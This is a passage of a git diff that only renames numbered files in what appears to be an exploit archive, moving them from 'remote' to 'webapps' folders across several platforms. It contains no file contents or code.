rename from platforms/linux/remote/18932.py
rename to platforms/linux/webapps/18932.py
diff --git a/platforms/linux/remote/20064.py b/platforms/linux/webapps/20064.py
similarity index 100%
rename from platforms/linux/remote/20064.py
rename to platforms/linux/webapps/20064.py
diff --git a/platforms/linux/remote/30472.rb b/platforms/linux/webapps/30472.rb
similarity index 100%
rename from platforms/linux/remote/30472.rb
rename to platforms/linux/webapps/30472.rb
diff --git a/platforms/multiple/remote/33578.txt b/platforms/multiple/webapps/33578.txt
similarity index 100%
rename from platforms/multiple/remote/33578.txt
rename to platforms/multiple/webapps/33578.txt
diff --git a/platforms/php/remote/35588.rb b/platforms/php/webapps/35588.rb
similarity index 100%
rename from platforms/php/remote/35588.rb
rename to platforms/php/webapps/35588.rb
diff --git a/platforms/windows/remote/14547.txt b/platforms/windows/webapps/14547.txt
similarity index 100%
rename from platforms/windows/remote/14547.txt
rename to platforms/windows/webapps/14547.txt
diff --git a/platforms/windows/remote/23875.txt b/platforms/windows/webapps/23875.txt
similarity index 100%
rename from platforms/windows/remote/23875.txt
rename to platforms/windows/webapps/23875.txt
diff --git a/platforms/windows/remote/26012.rb b/platforms/windows/webapps/26012.rb
similarity index 100%
rename from platforms/windows/remote/26012.rb
rename to platforms/windows/webapps/26012.rb
diff --git a/platforms/windows/remote/35410.py b/platforms/windows/webapps/35410.py
similarity index 100%
rename from platforms/windows/remote/35410.py
rename to platforms/windows/webapps/35410.py